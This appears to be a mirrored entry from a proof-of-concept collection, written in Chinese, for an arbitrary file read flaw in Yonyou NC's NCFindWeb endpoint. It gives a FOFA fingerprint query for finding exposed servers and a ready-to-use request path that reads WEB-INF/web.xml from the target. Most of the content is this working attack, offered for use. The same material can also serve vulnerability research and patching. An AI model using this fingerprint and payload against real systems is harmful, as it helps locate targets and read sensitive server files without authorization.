mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-07 11:58:05 +00:00
29 lines
584 B
Markdown
29 lines
584 B
Markdown
|
# 用友 NC NCFindWeb 任意文件读取漏洞
|
|||
|
|
|
|||
|
|
## 漏洞描述
|
|||
|
|
|
|||
|
|
用友NC存在任意文件读取漏洞,攻击者通过漏洞可读取服务器敏感文件
|
|||
|
|
|
|||
|
|
## 漏洞影响
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
用友NC
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## FOFA
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
icon_hash="1085941792"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 漏洞复现
|
|||
|
|
|
|||
|
|
登陆页面
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
验证POC **/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml**
|
|||
|
|
|
|||
|
|
|
|||
|
|
|